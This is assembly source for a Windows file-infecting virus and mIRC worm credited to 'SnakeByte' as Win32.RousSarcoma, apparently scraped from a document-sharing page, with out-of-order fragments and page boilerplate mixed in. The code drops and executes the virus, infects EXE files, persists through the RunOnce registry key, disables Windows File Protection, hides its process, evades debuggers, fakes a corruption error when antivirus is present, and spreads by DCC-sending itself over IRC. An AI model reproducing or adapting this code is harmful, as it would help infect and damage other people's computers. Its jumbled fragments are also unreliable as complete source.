mov esi, [ebp+NTableVA] ; get Name Pointer Table
SearchNextApi1:
push esi
lodsd
mov esi, eax

mov edi, edx
push ecx
cld
rep cmpsb ; check for api name
pop ecx
jz FoundApi1
pop esi ; get next API-Name

add esi, 4h
inc word ptr [ebp+counter]
cmp word ptr [ebp+counter], 2000h
je NotFoundApi1 ; if we checked more than 2000 API's we stop
jmp SearchNextApi1 ; check next
FoundApi1:
pop esi
movzx eax, word ptr [ebp+counter]
shl eax, 1h ; get right entry
add eax, dword ptr [ebp+OTableVA]

xor esi, esi ; clear esi --> eax
xchg eax, esi
lodsw
shl eax, 2h
add eax, dword ptr [ebp+ATableVA]
mov esi, eax ; get RVA
lodsd ; eax = Adress RVA
ret ; API offset in eax
NotFoundApi1:
xor eax, eax ; we failed :(
ret
; ***************************************************************************
; ----------------------[ Let's drop the virus to a file ]-------------------
; ***************************************************************************
DropIT:
push 0
push 080h ; normal
push 1 ; new file
push 0
push 0
push 40000000h ; write access
lea eax, [ebp+HiddenFile]
push eax
call dword ptr [ebp+YCreateFileA]
xchg eax, ebx ; Handle in ebx

RousSarc.asm
mov esi, ebp

add esi, ImageBase + Gap1 ; uninitialised data once again ;)
push 0 ; overlapped
lea ecx, [ebp+Write] ; written bytes
push ecx
push VirusSize ; Lenght
push esi ; Start of Data
push ebx ; File Handle
Call dword ptr [ebp+YWriteFile]
push ebx
call dword ptr [ebp+YCloseHandle]
xor eax, eax ; let's execute the virus

lea esi, [ebp+ProcessInformation]
push esi
lea esi, [ebp+StartupInfo]
push esi
lea esi, [ebp+HiddenFile]
push esi ; filename with commandline
; ***************************************************************************
; -----------------------[ open original program ]---------------------------
; ***************************************************************************
ExecuteHost:
mov eax,12345678h ; get back to old Imagebase+EIP

org $-4
retEIP dd 0h
add eax,12345678h
org $-4
retBas dd 0h
jmp eax
OldEIP dd 0h
OldBase dd 0h
NewEIP dd 0h
; ***************************************************************************
; --------------[ use GetProcAddress to retrieve API's ]---------------------
; ***************************************************************************
; this procedure is used in both parts of the virus !
; esi point to the names
; edi to the place where we save the offsets
; ebx contains module handle
; ecx got the number of api's
GetAPI3:
RousSarc.asm
push ecx ; save number
push esi ; push Api-name

push ebx ; push Module-Handle
; call GetProcAddress
cmp ebp, 'VA-A' ; if we are in the exe-part, we can call
je API3b ; the api directly
pushad ; check for int 1h tracing

push eax ; int 1h tracing destroys the stack, so we will see
pop eax ; if it is destroyed
sub esp, 4d
pop ecx
cmp eax, ecx
jne EndApi3
popad
API3a: ; otherwise we need the one found in the kernel

call dword ptr [ebp+XGetProcAddress]
jmp API3c
API3b:
call GetProcAddress
API3c:
stosd ; save offset
pushad
cmp eax, 0 ; Lets do a check for Softice Breakpoints
je NoSICheck
cmp byte ptr [eax], 0CCh ; check for the breakpoint
je EndApi3 ; due to the pushad, we will ret somewhere strange ;)
NoSICheck:
popad
pop ecx
dec ecx
jz EndApi3
push ecx ; point to next name
SearchZero:
cmp byte ptr [esi], 0h
je GotZero
inc esi
jmp SearchZero
GotZero:
inc esi
pop ecx
jmp GetAPI3 ; get next api
EndApi3:
ret
; ###########################################################################
; ----------------------[ Third Part - The Data ]----------------------------
; ###########################################################################
; ***************************************************************************
; ---------------------[ Data of the second part ]---------------------------
RousSarc.asm
; ***************************************************************************
NumberOf2Kernel32APIS equ 4
Kernel32Names2:
db 'CreateFileA', 0
db 'CloseHandle', 0
db 'WriteFile',0
db 'CreateProcessA',0
HiddenFile db 'C:\RousSarc.EXE',0 ; Rous Sarkoma is a well known Retro Virus

KERNEL32 db 'kernel32.dll',0 ; kernel32.dll .. :)
; ***************************************************************************
; ---------------------------[ Some Data ]-----------------------------------
; ***************************************************************************
VirusEnd:
K32Handle dd (?) ; Hier speichern wir das Handle der Kernel32.dll
XLoadLibraryA dd (?) ; Hier die Offsets der ersten beiden API's

XGetProcAddress dd (?)
; API's we need for the second part

YCreateFileA dd (?)
YCloseHandle dd (?)
YWriteFile dd (?)
YCreateProcessA dd (?)
StartofVirusinFile dd 0h
Write dd 0h
; Daten für die Kernel-Suche

KernelAddy dd (?) ; PE-Header
MZAddy dd (?) ; MZ-Header
counter dw (?) ; Wie viele Namen haben wir getestet
ATableVA dd (?) ; Address Table VA

NTableVA dd (?) ; Name Pointer Table VA
OTableVA dd (?) ; Name Pointer Table VA
; ***************************************************************************
; --------------------[ Initialized First Part Data ]------------------------
; ***************************************************************************
.DATA
CopyRight db 'Win32.RousSarcoma by SnakeByte',0
_2kProt db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0

_2kProtValue db 'SfcDisable',0
RunOnceName db '\RousSarc.EXE',0
RunOnceKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
filemask db '*.EXE', 0 ; get exe-files
; Data for mIRC Worming

MIRCscript db '[script]',13d,10d
db 'n0=on 1:join:#: { if ( $nick == $me ) halt', 13d,10d
db 'n1= else .timer 1 30 .dcc send $nick C:\RousSarc.EXE }', 13d,10d
db 'n2=on *:filesent:*.*: { if ( $nick != $me ) .dcc send $nick C:\RousSarc.EXE
}', 13d,10d
EndScript:
RousSarc.asm
mircINI db 'mirc.ini',0
MIRCrfiles db 'rfiles',0 ;what to patch
MOffset db 'n2',0
MIRCprot db 'RousSarc.ini',0
; Names of the API's we need

Kernel32Names:
NumberOfKernel32APIS equ 21d
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetCommandLineA',0
db 'ReadFile',0
db 'CreateProcessA',0
db 'GetSystemDirectoryA',0
db 'CopyFileA',0
db 'GetCurrentProcessId',0
db 'RegisterServiceProcess',0
db 'GetCurrentDirectoryA',0
db 'SetCurrentDirectoryA',0
db 'GetWindowsDirectoryA',0
db 'GetFullPathNameA',0
db 'WritePrivateProfileStringA',0
db 'WriteFile',0
advname db 'advapi32',0
AdvapiNames:
NumberOfAdvapiAPIS equ 6
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0
db 'RegSetValueExA',0
db 'RegCreateKeyExA',0
db 'RegEnumKeyA',0
StartupInfo:
db 64d
db 63d dup (0)
ProcessInformation:
hProcess dd 0h
hThread dd 0h
dwProcessId dd 0h
dwThreadId dd 0h
; ***************************************************************************
; -------------------[ Uninitialized First Part Data ]-----------------------
; ***************************************************************************
.DATA?
; API's we need for first Part
XFindFirstFileA dd ?
XFindNextFileA dd ?
XFindClose dd ?
XCreateFileA dd ?
RousSarc.asm
XCloseHandle dd ?
XCreateFileMappingA dd ?
XMapViewOfFile dd ?
XUnmapViewOfFile dd ?
XGetCommandLineA dd ?
XReadFile dd ?
XCreateProcessA dd ?
XGetSystemDirectoryA dd ?
XCopyFileA dd ?
XGetCurrentProcessId dd ?
XRegisterServiceProcess dd ?
XGetCurrentDirectoryA dd ?
XSetCurrentDirectoryA dd ?
XGetWindowsDirectoryA dd ?
XGetFullPathNameA dd ?
XWritePrivateProfileStringA dd ?
XWriteFile dd ?
; API's we need to edit the Registry

XRegOpenKeyExA dd ?
XRegQueryValueExA dd ?
XRegCloseKey dd ?
XRegSetValueExA dd ?
XRegCreateKeyExA dd ?
XRegEnumKeyA dd ?
ADVHandle dd ? ; Handle of ADVAPI32.dll
NewSize dd ? ; New Filesize

CmdLine dd ? ; Commandline
; Struktur for FindFirstFile / Next

FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
; data for FindFirstFile / Next API

WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
FileHandle dd ? ; Filehandle
MapHandle dd ? ; Handle of the Map
MapAddress dd ? ; Offset of the Map
Handle dd ?
Dispostiton dd ? ; dispostition when creating a reg key

RegHandle dd ? ; handle of an opened registry key
RegData1 dd ? ; Bytes read
InfCounter db ? ; Counter
RousSarc.asm
FindHandle dd ? ; Handle for FindFirstFile API

FileBuffer db VirusSize dup (?)
; We temporarily save the name of a possible AV
; to check if it is one
NameBuffer db 255d dup (?)
CurrentPath db 255d dup (?)
; ***************************************************************************
; ------------------------[ That's all, go home ]----------------------------
; ***************************************************************************
end Virus

Source Email Worm - win32.Rous.A

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Source Email Worm - win32.Rous.A

Uploaded by

Copyright:

Available Formats

RousSarc.

; define some API's

extrn MessageBoxA:PROC ; for testing

CPart1 equ 600h

mov ebp, 'VA-A' ; place a mark in ebp, to identify this part

lea eax, KERNEL32 ; push name of kernel32.dll

lea esi, Kernel32Names ; get all API's we need from kernel

lea eax, advname ; push name of advapi32.dll

lea esi, AdvapiNames ; get all API's we need from kernel

; Lets hide our Application from the CTRL-ALT-DEL List,

; Check if the API is available

; Get ID of our process

push 1 ; We want to run as a service

call dword ptr [XGetCommandLineA]

; the start of the commandline is in eax,

add eax, 2h ; skip blanc and "

AVMessage: ; Arg ! Dirty AV found .. :P

push 30h ; Style

AVMsg db "File is corrupted. Can't start program",0

mIRCcheck: ; we search for the path

push offset PathEnd

mov edi, dword ptr [PathEnd]

push offset NameBuffer ; Write our entry to the file

mov edi, dword ptr [PathEnd]

push eax ; save filehandle

push 0 ; write script to file

; Handle is still on the stack, so we close the file

CommandReceive2: ; so we will be able to locate the file and

cmp eax, -1 ; file is not there :(

pushad ; save registers

lea esi, WFD_szFileName ; point to filename

; esi points to start of filename

; ebx points to the parameters

xor eax, eax ; let's execute the file

SetRunOnceKey: ; Here we go if we found an AV or got

; Now we store the name of this file in the RunOnce key

xor eax, eax ; search for end of Systemdirectory

push dword ptr [RegHandle]

push offset RegHandle

test eax, eax ; if we failed opening the key, we return

; Value to disable Windows File Protection

No2kProt: ; Now we will copy ourselfes into the windows directory

xor eax, eax ; search for end of Systemdirectory

; Copy our file to the system directory

call dword ptr [XCopyFileA]

; Lets set the Exefiles Key

; Let's set our Value

push dword ptr [RegHandle]

push offset RegHandle

test eax, eax ; if we failed opening the key, we return

xor eax, eax ; clear eax

push offset RegData2

; we decide what to do, but first, we increment the

; Close the key

mov eax, dword ptr [RegBuffer]

push offset RegHandle

push offset RegHandle2

mov dword ptr [RegData2], 255d

push offset RegData2

push dword ptr [RegHandle2]

lea edi, NameBuffer ; Remove ; to get directory

push offset CurrentPath ; Get Current dir and save it

; Save EIP & Imagebase